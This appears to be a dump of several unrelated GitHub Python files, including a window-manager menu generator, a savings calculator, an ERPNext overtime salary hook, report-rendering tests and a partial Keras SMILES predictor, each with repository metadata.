open(get_absolute_rolling_songs_dir() + \"config/example.json\", \"r\") as example_conf:\n required_fields = json.load(example_conf).keys()\n\n error = False\n error_msg = ''\n for field in required_fields:\n if field not in config.keys():\n error = True\n error_msg += f'\\\"{field}\\\", '\n \n if error:\n debug_print('ERROR: your config.json is missing the following required fields:')\n debug_print('\\t[ ', end='')\n error_msg = error_msg[:-2] # pop trailing comma and space\n debug_print(error_msg, end='')\n debug_print(' ]')\n exit(1)\n\n return config\n\ndef write_config(config):\n with open(get_absolute_rolling_songs_dir() + \"config/config.json\", \"w\") as cfile:\n json.dump(config, cfile, indent=4)\n \n# return none if wrong mode\ndef get_liked_song_max(config):\n if \"MAINTAIN_NUM_SONGS\" in config[\"UPDATE_RULE\"]:\n return config[\"UPDATE_RULE\"][\"MAINTAIN_NUM_SONGS\"]\n\n return None\n\ndef get_liked_days_max(config):\n if \"MAINTAIN_NUM_DAYS\" in config[\"UPDATE_RULE\"]:\n return config[\"UPDATE_RULE\"][\"MAINTAIN_NUM_DAYS\"]\n\n return None","repo_name":"michaeljecmen/liked-songs-sliding-window","sub_path":"helpers/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"339112559","text":"#!/usr/bin/python3\n# menudesktop: Genera un menú a partir de archivos desktop entry.\n# GPL v3+\n\nimport os\nimport unidecode\nimport glob\nfrom collections import OrderedDict\nimport argparse\n\ndefwm = 'openbox'\neditor = 'gvim'\nexecutor = 'exo-open'\nfileman = 'exo-open --launch FileManager'\nwmexec = 'xfce4-appfinder --collapsed'\nsupported_wms = ('openbox', 'fvwm')\n#default_dir = os.environ['HOME'] + '/.local/share/applications'\ndefault_dir = os.environ['HOME'] + '/bin/apps'\ndirs = (default_dir,)\n#dirs = (default_dir, '/usr/share/applications')\nfromcache = False\ncachepath = os.path.expandvars('$HOME') + '/.cache'\nallapps = False\ndeadicon = False\n\nlang = os.environ['LANG']\nlong_lang = lang.split('.')[0] # es_ES\nshort_lang = long_lang.split('_')[0] # en\n\nfull_lang = lang.replace('UTF-8', 'utf8') # Renaming in Thunar.\nfmt_full_lang = '[' + full_lang + ']' # Renaming in Thunar.\nfmt_long_lang = '[' + long_lang + ']' # [es_ES]...\nfmt_short_lang = '[' + short_lang + ']' # [en]...\nlocale = {\n 'en': {\n 'AudioVideo': 'Multimedia',\n 'Audio': 'Audio',\n 'Video': 'Video',\n 'Development': 'Development',\n 'Education': 'Education',\n 'Game': 'Games',\n 'Graphics': 'Graphics',\n 'Network': 'Networks',\n 'Office': 'Office',\n 'Settings': 'Settings',\n 'System': 'System',\n 'Utility': 'Utilities',\n },\n 'es': {\n 'AudioVideo': 'Multimedia',\n 'Audio': 'Audio',\n 'Video': 'Vídeo',\n 'Development': 'Programación',\n 'Education': 'Educación',\n 'Game': 'Juegos',\n 'Graphics': 'Gráficos',\n 'Network': 'Redes',\n 'Office': 'Oficina',\n 'Settings': 'Ajustes',\n 'System': 'Sistema',\n 'Utility': 'Accesorios',\n },\n }\n\nclass Item:\n fsep = '=' # Separador de campos\n esep = ';' # Separador de elementos\n\n\n def __init__(self, dfile):\n self.fdict = {} # Diccionario del archivo\n try:\n self.myfile = open(dfile, 'r')\n except IOError:\n print('No puedo abrir el archivo', dfile)\n exit(1)\n\n for line in self.myfile:\n if line.startswith('#') or line.isspace() or line.startswith('['):\n continue\n f = line.split(self.fsep) # Separamos las líneas en campos\n self.fdict[f[0].strip()] = f[1].strip()\n self.myfile.close()\n\n self.execute = executor + ' ' + dfile\n self.label = getlang('Name', self.fdict, os.path.basename(dfile))\n self.icon = getlang('Icon', self.fdict, 'image_missing')\n self.menu = getlang('Categories', self.fdict, '0') # 0 para ordenarlo\n\n for i in self.menu.split(';'):\n if i in locale[short_lang]:\n self.menu = self.menu.replace(i, locale[short_lang][i])\n\n executable = self.fdict['Exec'].strip().partition(' ')[0]\n self.avaible = which(executable)\n if not self.avaible:\n self.label = self.label + ' (No instalado)'\n self.execute = install(executable)\n if deadicon:\n self.icon = 'no_installed'\n\n\n def addto(self, d):\n if not allapps and not self.avaible:\n return 0\n for menu in self.menu.split(self.esep):\n menu = menu.strip()\n if menu in d:\n d[menu].append([self.label, self.execute, self.icon])\n else:\n d[menu] = [[self.label, self.execute, self.icon]]\n\n\ndef getlang(tag, dic, fallback):\n candidates = (\n tag + fmt_full_lang,\n tag + fmt_long_lang,\n tag + fmt_short_lang,\n tag\n )\n for candidate in candidates:\n if candidate in dic:\n return(dic[candidate])\n return(fallback)\n\n\ndef which(program):\n fpath, fname = os.path.split(program)\n if fpath:\n # Si se especifica una ruta completa.\n exe = program\n else:\n # Si no, busca el ejecutable en PATH.\n for path in os.environ[\"PATH\"].split(os.pathsep):\n exe = os.path.join(path, program)\n if os.path.isfile(exe):\n break\n if os.access(exe, os.X_OK):\n return True\n else:\n return False\n\n\ndef install(app):\n cmdline = 'gksu pacman -Syu ' + app\n return(cmdline)\n\ndef dfind(mydir):\n '''Find destop files in a dir'''\n try:\n os.listdir(mydir)\n dfiles = glob.glob(mydir + \"/*.desktop\")\n except:\n return(mydir, 'no es un directorio')\n # FIXME: Si glob está vacío devuelve []\n return(dfiles)\n\ndef gen_dbase():\n dbase = {}\n for mydir in dirs:\n alldfiles = dfind(mydir)\n for afile in alldfiles:\n app = Item(afile)\n app.addto(dbase)\n dbase = OrderedDict(sorted(dbase.items(), key=lambda t: t[0]))\n return(dbase)\n\n\ndef gen_format(wm):\n dbase = gen_dbase()\n if wm == 'openbox':\n fdbase = gen_openbox(dbase)\n elif wm == 'fvwm':\n fdbase = gen_fvwm(dbase)\n else:\n print('No sé cómo producir un menú para ' + wm + '.'\n + wm + 'no está soportado.')\n exit(1)\n return(fdbase)\n\n\ndef print_format(wm):\n data = gen_format(wm)\n for line in data:\n print(line)\n\n\ndef write_cache(wm):\n cache = cachepath + '/menuapps.' + wm + '.cache'\n data = gen_format(wm)\n\n try:\n cache_w = open(cache, 'w')\n for line in data:\n cache_w.write(line + '\\n')\n except IOError:\n print('No puedo escribir en ' + cache)\n exit(1)\n cache_w.close()\n\n\ndef print_from_cache(wm):\n if wm in supported_wms:\n cache = cachepath + '/menuapps.' + wm + '.cache'\n else:\n print('No sé cómo leer un menú para ' + wm)\n exit(1)\n try:\n cache_r = open(cache, 'r')\n for line in cache_r:\n print(line, end='')\n except IOError:\n print('No puedo leer en ' + cache)\n exit(1)\n\n\ndef gen_openbox(db):\n openbox = []\n #icondir = os.environ['OPENBOX_ICONDIR']\n icondir = '/usr/local/share/icons/retrosmart/scalable'\n ext = '.svg'\n noiconfile = icondir + '/' + 'image-missing' + ext\n separator = True\n\n openbox.append('')\n openbox.append(\n ''\n + '' + fileman + ' ' + default_dir\n + '')\n\n if fromcache:\n openbox.append(\n ''\n + ''\n + 'menuapps -w openbox')\n\n openbox.append('')\n openbox.append(\n '' + wmexec\n + '')\n\n if db:\n openbox.append('')\n for submenu in db.keys():\n if not submenu: # Hay entradas vacías\n continue\n fmtsubmenu = unidecode.unidecode(submenu).lower().replace(' ', '_')\n\n if submenu != '0':\n if separator:\n openbox.append('')\n separator = False\n\n openbox.append(\n '')\n\n for item in sorted(db[submenu]): # Contenido de submenus ordenados\n label = item[0]\n execute = item[1]\n icon = item[2]\n\n if not '/' in icon:\n iconfile = icondir + '/' + icon + ext\n else:\n iconfile = icon\n\n if os.path.isfile(iconfile):\n iconpath = iconfile\n else:\n iconpath = noiconfile\n\n openbox.append(\n '' + execute +\n '')\n if submenu != '0':\n openbox.append('')\n else:\n openbox.append(\n '' + '')\n openbox.append('')\n return(openbox)\n\n\ndef gen_fvwm(db):\n fvwm = []\n icondir = '/usr/local/share/icons/retrosmart/scalable' # Para image-missing\n ext = '.svg'\n\n fvwm.append('+ \"Aplicaciones\" Title')\n fvwm.append(\n '+ \"_Editar este menú%pencil.svg:22x22%\" Exec ' + editor + ' ' + conf)\n fvwm.append('+ \"Recargar caché%reload.svg:22x22%\" Exec menuapps -w fvwm')\n fvwm.append('+ \"\" Nop')\n fvwm.append('+ \"Ejecutar%system-run.svg:22x22%\" Exec ' + wmexec)\n fvwm.append('+ \"\" Nop')\n\n if db:\n for submenu in db.keys():\n lowersubmenu = submenu.lower()\n unacclowersubmenu = unidecode.unidecode(submenu).lower()\n\n fvwm.append(\n '+ \"' + submenu + '%' + unacclowersubmenu + ext + ':22x22%\"'\n + ' Popup ' + submenu)\n\n for submenu in db.keys():\n fvwm.append('DestroyMenu ' + submenu)\n fvwm.append('AddToMenu ' + submenu + ' \"' + submenu + '\" Title')\n\n for item in sorted(db[submenu]):\n label = item[0].strip()\n execute = item[1].strip()\n icon = item[2].strip()\n\n # Podría coger el icono directamente del las opciones de fvwm\n # pero perderíamos la funcionalidad de image-missing.\n iconfile = icondir + '/' + icon + ext\n noiconfile = icondir + '/' + 'image-missing' + ext\n if os.path.isfile(iconfile):\n iconpath = iconfile\n else:\n iconpath = noiconfile\n\n fvwm.append(\n '+ \"' + label + '%' + iconpath + ':22x22%\"'\n + ' Exec ' + execute)\n else:\n fvwm.append(\n '' + '')\n\n return(fvwm)\n\n\ndef gen_blackbox(db):\n blackbox = []\n icondir = os.environ['OPENBOX_ICONDIR']\n ext = '.png'\n\n blackbox.append('')\n blackbox.append(\n ''\n + '' + editor + ' ' + conf\n + '')\n blackbox.append(\n ''\n + ''\n + 'menuapps blackbox')\n blackbox.append('')\n blackbox.append(\n ''\n + wmexec + '')\n blackbox.append('')\n\n if db:\n for submenu in db.keys():\n lowersubmenu = submenu.lower()\n unacclowersubmenu = unidecode.unidecode(submenu).lower()\n\n if submenu != '0':\n blackbox.append(\n '')\n\n for item in sorted(db[submenu]):\n label = item[0].strip()\n execute = item[1].strip()\n icon = item[2].strip()\n\n blackbox.append(\n '' + execute\n + '')\n if submenu != '0':\n blackbox.append('')\n\n else:\n blackbox.append(\n '' + '')\n blackbox.append('')\n return(blackbox)\n\n\ndef gen_fluxbox(db):\n fluxbox = []\n icondir = os.environ['OPENBOX_ICONDIR']\n ext = '.png'\n\n fluxbox.append('')\n fluxbox.append(\n ''\n + '' + editor + ' ' + conf\n + '')\n fluxbox.append(\n ''\n + ''\n + 'menuapps fluxbox')\n fluxbox.append('')\n fluxbox.append(\n ''\n + wmexec + '')\n fluxbox.append('')\n\n if db:\n for submenu in db.keys():\n lowersubmenu = submenu.lower()\n unacclowersubmenu = unidecode.unidecode(submenu).lower()\n\n if submenu != '0':\n fluxbox.append(\n '')\n\n for item in sorted(db[submenu]):\n label = item[0].strip()\n execute = item[1].strip()\n icon = item[2].strip()\n\n fluxbox.append(\n ''\n + execute + '')\n if submenu != '0':\n fluxbox.append('')\n\n else:\n fluxbox.append(\n '' + '')\n fluxbox.append('')\n return(fluxbox)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n 'wm', help='El tipo de WM para el que se producirá el menú.')\nparser.add_argument(\n '-c', '--cache', action='store_true',\n help='Imprime el menú desde la caché.')\nparser.add_argument(\n '-w', '--write', action='store_true',\n help='Escribe la caché.')\nparser.add_argument(\n '-a', '--allapps', action='store_true',\n help='Muestra la aplicación aunque no esté instalada.')\nparser.add_argument(\n '-i', '--icons', action='store_true',\n help='Muestra el icono de la aplicación no instalada. No una lápida.')\n\nargs = parser.parse_args()\n\nif args.allapps:\n # Muestra todas las aplicaciones, aunque no estén instaladas.\n allapps = args.allapps\n if args.icons:\n # Muestra el icono de la aplicación no instalada en lugar de una lápida\n # No se tiene en cuenta si no se emplea -a\n deadicon = args.icons\n\nif args.cache:\n # Imprime desde archivo caché.\n print_from_cache(args.wm)\nelif args.write:\n # Escribe archivo caché desde conf.\n # FIXME: Añadir mensaje de error para wm\n write_cache(args.wm)\nelse:\n # Imprime desde archivo conf.\n # FIXME: Añadir mensaje de error para wm\n print_format(args.wm)\n","repo_name":"mdomlop/menudesktop","sub_path":"menudesktop.py","file_name":"menudesktop.py","file_ext":"py","file_size_in_byte":15801,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31417416841","text":"# coding=utf-8\nimport os\n\ndef re_README(file):\n f = open(file, encoding=\"utf-8\")\n urls = []\n for i in f.readlines():\n i = i.strip(\"\\n\").strip(\" \")\n i = i + \" \" + \"\\n\"\n urls.append(i)\n f.close()\n\n with open(file, \"w+\", encoding=\"utf-8\") as f:\n for i in urls:\n f.write(i)\n f.close()\ndef list_file(dir_name):\n files=os.listdir(dir_name)\n new_file=os.path.abspath(dir_name)\n for file in files:\n file=new_file+\"\\\\\"+file\n if os.path.isdir(file):\n list_file(file)\n #print(file)\n elif \"README.md\" in file:\n print(file)\n re_README(file)\n\ndir_name=os.path.dirname(__file__)\nprint(dir_name)\nlist_file(dir_name)\n\n\n\n","repo_name":"nihaohello/N-MiddlewareScan","sub_path":"Github_README_deal.py","file_name":"Github_README_deal.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"11617295243","text":"class Solution() :\n def saving_with_raise(self) :\n annual_salary = float(input(\"Enter your annual salary: \"))\n portion_saved = float(input(\"Enter the percent of your salary to save, as a decimal: \"))\n total_cost = float(input(\"Enter the cost of your dream home: \"))\n semi_annual_raise = float(input(\"Enter the semi­annual raise, as a decimal: \"))\n portion_down_payment = 0.25\n current_savings = 0\n months = 0\n while current_savings < (total_cost * portion_down_payment) :\n monthly_salary = annual_salary / 12\n months += 1\n current_savings += current_savings * 0.04 / 12\n current_savings += monthly_salary * portion_saved\n if months % 6 == 0 :\n annual_salary *= (semi_annual_raise + 1)\n print(f'Number of months: {months}')\n\nmy_sol = Solution()\nmy_sol.saving_with_raise()\n ","repo_name":"luluowens/AoPS","sub_path":"MIT 6.0001/problem_set_1/saving_with_a_raise.py","file_name":"saving_with_a_raise.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13562921215","text":"import multiprocessing\n\nimport select\nimport time\n\nimport lcm\n\nfrom test_message import test_message\n\n\ndef sender(chanel: str):\n message = test_message()\n _lcm = lcm.LCM()\n\n # Sample\n message.name = \"Mathieu Tuli\"\n message.value = \"TEST VALUE\"\n _lcm.publish(chanel, message.encode())\n # End of sample\n\n # ADD CODE HERE\n ################\n\n\ndef listener(channel, data):\n message = test_message.decode(data)\n print(f\"\\nReceived test_message on {channel}\")\n print(f\" {message.name}\")\n print(f\" {message.value}\")\n\n\ndef main():\n channel_name = \"PRACTICE\"\n sender_process = multiprocessing.Process(\n target=sender, args=(channel_name,))\n sender_process.start()\n\n lcm_1 = lcm.LCM()\n lcm_1.subscribe(channel_name, listener)\n\n timeout = 2\n while True:\n try:\n rfds, wfds, efds = select.select([lcm_1.fileno()], [], [],\n timeout)\n if rfds:\n lcm_1.handle()\n else:\n print(\"\\nLCM 1: I think that's all folks\")\n except KeyboardInterrupt:\n break\n\n\nmain()\n","repo_name":"ArnavJain23/pod1-software-core","sub_path":"software/git-practice/send_and_receive.py","file_name":"send_and_receive.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"22673442719","text":"import frappe\nfrom erpnext.hr.doctype.salary_structure.salary_structure import make_salary_slip\n\n\ndef validate(doc, method):\n basic_component = [x for x in doc.earnings if x.abbr == 'B']\n default_basic_amount = 0\n if basic_component:\n basic_component = basic_component[0]\n default_basic_amount = basic_component.default_amount\n else:\n frappe.throw('Basic(B) component not found!')\n\n employee_settings = frappe.db.get_value('Employee', doc.employee, fieldname=[\n 'attendance', 'overtime'], as_dict=True)\n attendance = employee_settings.get('attendance', 0)\n overtime = employee_settings.get('overtime', 0)\n if attendance and overtime:\n overtime_threshold = float(frappe.get_cached_value(\n 'Company', doc.company, 'overtime_threshold'))\n overtime_factor = float(frappe.get_cached_value(\n 'Company', doc.company, 'overtime_factor'))\n lunch_threshold = float(frappe.get_cached_value(\n 'Company', doc.company, 'lunch_threshold'))\n combined_overtime_threshold = overtime_threshold + lunch_threshold\n overtime_hours = frappe.db.sql(\n \"\"\"\n\t\t\tSELECT \n\t\t\t\tSUM(working_hours-%s) \n\t\t\tFROM `tabAttendance` \n\t\t\tWHERE status='Present' \n\t\t\tAND employee=%s \n\t\t\tAND attendance_date>=%s \n\t\t\tAND attendance_date<=%s \n\t\t\tAND working_hours>%s\n\t\t\t\"\"\",\n (combined_overtime_threshold, doc.employee, doc.start_date, doc.end_date, combined_overtime_threshold))\n overtime_hours = overtime_hours[0][0]\n if overtime_hours:\n\n hourly_pay_rate = default_basic_amount / (26 * 8)\n overtime_amount = overtime_hours * overtime_factor * hourly_pay_rate\n if overtime_amount > 0:\n add_earning_for_hourly_wages(\n doc, doc._salary_structure_doc.overtime_component, overtime_amount)\n doc.calculate_net_pay()\n doc.overtime_pay_rate = hourly_pay_rate * overtime_factor\n doc.overtime_hours = overtime_hours\n # update_deductions(doc)\n\n\ndef add_earning_for_hourly_wages(doc, salary_component, amount):\n row_exists = False\n for row in doc.earnings:\n if row.salary_component == salary_component:\n row.amount = amount\n row_exists = True\n break\n\n if not row_exists:\n wages_row = {\n \"salary_component\": salary_component,\n \"abbr\": frappe.db.get_value(\"Salary Component\", salary_component, \"salary_component_abbr\"),\n \"amount\": amount,\n \"default_amount\": 0.0,\n \"additional_amount\": 0.0,\n \"is_tax_applicable\": 1\n }\n doc.append('earnings', wages_row)\n\n# def update_deductions(doc):\n# data = doc.get_data_for_eval()\n# for struct_row in doc._salary_structure_doc.get(\"deductions\"):\n# amount = doc.eval_condition_and_formula(struct_row, data)\n# if (amount == 0 and struct_row in doc._salary_structure_doc.get(\"deductions\")):\n# doc.update_component_row(struct_row, amount, \"deductions\")\n ","repo_name":"SunilBGovind/mf_test_env","sub_path":"negentropy_hr/validations/salary_slip.py","file_name":"salary_slip.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11412274288","text":"#!/usr/bin/env python3\n\"\"\"\nTest the pipeline results:\n * does hiding inputs and outputs work as expected?\n\"\"\"\n\nfrom reportsrender.papermill import render_papermill, _remove_cells\nimport nbformat\nfrom pprint import pprint\n\n\ndef test_remove_cells():\n \"\"\"Test that removing and keeping outputs works properly. \"\"\"\n nb = nbformat.from_dict(\n {\n \"cells\": [\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {\"tags\": [\"hide_input\"]},\n \"source\": \"# REMOVE_CELL\",\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {\"tags\": [\"remove_input\"]},\n \"source\": \"# REMOVE_CELL\",\n },\n {\n \"cell_type\": \"code\",\n \"metadata\": {},\n \"outputs\": [\n {\n \"data\": {\n \"image/png\": \"base64\",\n \"text/plain\": \"INCLUDE_OUTPUT_01\",\n }\n }\n ],\n \"source\": \"# INCLUDE_INPUT_01\",\n },\n {\n \"cell_type\": \"code\",\n \"metadata\": {\"tags\": [\"remove_cell\"]},\n \"outputs\": [\n {\"data\": {\"image/png\": \"base64\", \"text/plain\": \"REMOVE_CELL\"}}\n ],\n \"source\": \"# REMOVE_CELL\",\n },\n {\n \"cell_type\": \"code\",\n \"metadata\": {\"tags\": [\"hide_output\"]},\n \"outputs\": [\n {\"data\": {\"image/png\": \"base64\", \"text/plain\": \"REMOVE_CELL\"}}\n ],\n \"source\": \"# INCLUDE_INPUT_02\",\n },\n ],\n \"metadata\": {},\n \"nbformat\": 4,\n \"nbformat_minor\": 0,\n }\n )\n\n nb2 = _remove_cells(nb)\n\n assert nb2 == nb\n\n str_repr = str(nb)\n\n pprint(nb)\n\n assert \"INCLUDE_OUTPUT_01\" in str_repr\n assert \"INCLUDE_INPUT_01\" in str_repr\n assert \"INCLUDE_INPUT_02\" in str_repr\n assert \"REMOVE_CELL\" not in str_repr\n\n\ndef test_render_papermill(tmp_path):\n in_file = \"notebooks/02_analyze_data.Rmd\"\n out_file = tmp_path / \"report.html\"\n params = {\"input_file\": \"notebooks/iris.tsv\"}\n render_papermill(in_file, out_file, params)\n\n result = out_file.read_text()\n\n assert \"ECHO_FALSE\" not in result\n assert \"RESULTS_HIDE\" not in result\n assert \"ECHO_TRUE_01\" in result\n assert \"ECHO_TRUE_02\" in result\n assert \"RESULTS_SHOW_01\" in result\n assert \"RESULTS_SHOW_02\" in result\n\n\ndef test_render_papermill_ipynb(tmp_path):\n \"\"\"The same should work for a ipynb input file\"\"\"\n in_file = \"notebooks/02_analyze_data.ipynb\"\n out_file = tmp_path / \"report.html\"\n params = {\"input_file\": \"notebooks/iris.tsv\"}\n render_papermill(in_file, out_file, params)\n\n result = out_file.read_text()\n\n assert \"ECHO_FALSE\" not in result\n assert \"RESULTS_HIDE\" not in result\n assert \"ECHO_TRUE_01\" in result\n assert \"ECHO_TRUE_02\" in result\n assert \"RESULTS_SHOW_01\" in result\n assert \"RESULTS_SHOW_02\" in result\n\n\ndef test_render_papermill_md(tmp_path):\n \"\"\"... and a markdown input file (jupytext format) \"\"\"\n in_file = \"notebooks/02_analyze_data.md\"\n out_file = tmp_path / \"report.html\"\n params = {\"input_file\": \"notebooks/iris.tsv\"}\n render_papermill(in_file, out_file, params)\n\n result = out_file.read_text()\n\n assert \"ECHO_FALSE\" not in result\n assert \"RESULTS_HIDE\" not in result\n assert \"ECHO_TRUE_01\" in result\n assert \"ECHO_TRUE_02\" in result\n assert \"RESULTS_SHOW_01\" in result\n assert \"RESULTS_SHOW_02\" in result\n","repo_name":"grst/reportsrender","sub_path":"tests/test_papermill.py","file_name":"test_papermill.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"11910430093","text":"names = ['Jerry', 'Kramer', 'Elaine', 'George', 'Newman']\n\n# Pythonic way of looping over list uses list comprehension. Note that lists are ordered collections of items or objects. This makes lists in Python \n# \"sequence types\", as they behave like a sequence. This means that they can be iterated using for loops. Other examples of sequences are Strings, \n# tuples, or sets. Lists are similar in spirit to strings you can use the len() function and square brackets [ ] to access the data, with the first\n# element indexed at 0.\n\n# loop over the contents of names \nbetter_list = []\nfor name in names:\n if len(name) >= 6:\n better_list.append(name)\nprint(better_list)\n\n# Print the list created by using list comprehension\nbest_list = [name.upper() for name in names if len(name) >= 6]\nprint(best_list)\n\nMyNumbers = [1, 2]\nS = [x**2 for x in MyNumbers]\nprint(S)","repo_name":"DataElevated/python","sub_path":"Lists/ListComprehension.py","file_name":"ListComprehension.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17688423571","text":"#coding:utf8\nimport os\nimport zipfile\nfrom django_project.settings import BASE_DIR\nimport codecs\n\n\ndef zip_compress(dir_name, zip_file_target, path, exclude_files, target_path):\n if dir_name in exclude_files:\n return\n currentPath = \"%s/%s\" % (path, dir_name)\n if os.path.isdir(currentPath) == True:\n files = os.listdir(currentPath)\n for file in files:\n zip_compress(file, zip_file_target, currentPath, exclude_files, target_path +\"/\" + dir_name)\n else:\n zip_file_target.write(currentPath, target_path + \"/\" +dir_name)\n\n\ndef compress_in_folder():\n root_folder = BASE_DIR\n zipf = zipfile.ZipFile('%s/result.zip' % root_folder, 'w')\n # zip the path\n dir_path = '%s/db_reverse/temp' % root_folder\n files = os.listdir(dir_path)\n exclude_file = [\".gitignore\", \".git\"]\n for file in files:\n if file not in exclude_file:\n zip_compress(file, zipf, dir_path, exclude_file, \"\")\n zipf.close()\n\n\ndef save_string_to_file(file_name, content):\n root_folder = BASE_DIR\n temp_file = '%s/db_reverse/temp/%s' % (root_folder, file_name)\n file = codecs.open(temp_file, \"w+\", \"utf-8\")\n file.write(content)\n file.close()","repo_name":"t3573393/django_admin_db_reverse","sub_path":"django_project/db_reverse/codegen/filecompress.py","file_name":"filecompress.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31948385178","text":"\"\"\"\nWrite two functions to find the minimum number in a list.\nFirst function: O(n)\nSecond function: O(n**2)\n\"\"\"\n\n\ndef search_minimum1(list1):\n \"\"\"\n Complexity O(n)\n \"\"\"\n temp = list1[0]\n for i in range(1, len(list1)):\n if list1[i] < temp:\n temp = list1[i]\n return temp\n\n\ndef search_minimum2(list2: list):\n \"\"\"\n Complexity O(n**2)\n \"\"\"\n for i in range(len(list2)):\n temp = list2[i]\n for j in range(1, len(list2)):\n if temp > list2[j]:\n temp = list2[j]\n return temp\n\n\nlista = [10, 30, 20, 5, 15, 3, 1, 0.2, 0.05]\nprint(search_minimum2(lista))\nprint(search_minimum1(lista))","repo_name":"oliveiraiago/estruturaDeDados","sub_path":"bigO.py","file_name":"bigO.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13515700952","text":"import unittest\n\nfrom robot.reporting.logreportwriters import LogWriter\nfrom robot.utils.asserts import assert_true, assert_equal\n\n\nclass LogWriterWithMockedWriting(LogWriter):\n\n def __init__(self, model):\n LogWriter.__init__(self, model)\n self.split_write_calls = []\n self.write_called = False\n\n def _write_split_log(self, index, keywords, strings, path):\n self.split_write_calls.append((index, keywords, strings, path))\n\n def _write_file(self, output, config, template):\n self.write_called = True\n\n\n\nclass TestLogWriter(unittest.TestCase):\n\n def test_splitting_log(self):\n class model:\n split_results = [((0, 1, 2, -1), ('*', '*1', '*2')),\n ((0, 1, 0, 42), ('*','*x')),\n (((1, 2), (3, 4, ())), ('*',))]\n writer = LogWriterWithMockedWriting(model)\n writer.write('mylog.html', None)\n assert_true(writer.write_called)\n assert_equal([(1, (0, 1, 2, -1), ('*', '*1', '*2'), 'mylog-1.js'),\n (2, (0, 1, 0, 42), ('*', '*x'), 'mylog-2.js'),\n (3, ((1, 2), (3, 4, ())), ('*',), 'mylog-3.js')],\n writer.split_write_calls)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"robotframework/robotframework","sub_path":"utest/reporting/test_logreportwriters.py","file_name":"test_logreportwriters.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"43706891659","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# (c) 2018-2019 gmrandazzo@gmail.com\n# This file is part of DeepMolecularNetwork.\n# You can use,modify, and distribute it under\n# the terms of the GNU General Public Licenze, version 3.\n# See the file LICENSE for details\n\nfrom SMILES2Matrix import SMILES2MX\nimport argparse\n# from keras.callbacks import Callback, EarlyStopping, TensorBoard\n# from miscfun import exp_pred_plot\nimport numpy as np\nimport sys\n# from sklearn.model_selection import RepeatedKFold\n# from tensorflow import set_random_seed\nimport os\nimport tensorflow as tf\nif int(tf.__version__[0]) > 1:\n from tensorflow.keras import backend as K\nelse:\n from keras import backend as K\n# Some memory clean-up\nK.clear_session()\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(\"%s/../Base\" % (dir_path))\nfrom dmnnio import ReadDescriptors\nfrom modelhelpers import LoadKerasModels\n\nclass ModelPredictor(object):\n def __init__(self, mpath, smiles, csv_descriptors=None):\n self.mpath = mpath\n self.X, self.input_shape = self.ReadSMILES(smiles)\n if csv_descriptors is not None:\n self.desc, self.nfeatures, self.header = ReadDescriptors(csv_descriptors)\n else:\n self.desc = None\n self.nfeatures = 0\n self.header = None\n\n self.keys = None\n if self.nfeatures > 0:\n self.keys = []\n all_keys_ = None\n if len(self.X.keys()) > len(self.desc.keys()):\n all_keys_ = self.X.keys()\n else:\n all_keys_ = self.desc.keys()\n for key in all_keys_:\n if key in self.X.keys() and key in self.desc.keys():\n self.keys.append(key)\n else:\n continue\n else:\n self.keys = self.X.keys()\n self.dmap = None\n if self.nfeatures > 0:\n # check that all the descriptors\n # are present in the previous loaded desc\n nf = []\n self.dmap = {}\n for i in range(len(self.odesc)):\n if self.odesc[i] in self.header:\n self.dmap[self.odesc[i]] = i\n else:\n nf.append(self.odesc[i])\n if len(nf) > 0:\n print(\"Error! Missing some descriptors\")\n print(nf)\n exit()\n return\n\n def ReadSMILES(self, smiles_list):\n s2m = SMILES2MX(512)\n f = open(smiles_list, \"r\")\n X = {}\n for line in f:\n v = str.split(line.strip(), \"\\t\")\n print(\"Parsing: %s\" % (v[1]))\n X[v[1]] = np.array(s2m.smi2mx(v[0]))\n f.close()\n return X, s2m.getshape()\n\n def GenData(self):\n batch_features = np.array([]).reshape(0, self.nfeatures)\n for key in self.desc.keys():\n x = [0 for i in range(self.nfeatures)]\n for i in range(len(self.X_raw[key])):\n p = self.dmap[self.header[i]]\n x[p] = self.X_raw[key][i]\n # align column header\n batch_features = np.vstack([batch_features, x])\n return batch_features\n\n def predict(self, pout):\n \n predictions = {}\n for key in self.keys:\n predictions[key] = []\n\n x_topred = self.GenData()\n for model in LoadKerasModels(self.mpath):\n y_pred = list(model.predict(x_topred))\n # Store the prediction results based on the input generation\n for i in range(len(y_pred)):\n predictions[self.keys[i]].append(y_pred[i])\n\n fo = open(pout, \"w\")\n for key in predictions.keys():\n print(\"Store %s\" % (key))\n if len(predictions[key]) > 0:\n ypavg = np.mean(predictions[key])\n ystdev = np.std(predictions[key])\n y_min = np.min(predictions[key])\n y_max = np.max(predictions[key])\n fo.write(\"%s,%.4f,%.4f,%.4f,%.4f\\n\" % (key,\n ypavg,\n ystdev,\n y_min,\n y_max))\n else:\n continue\n 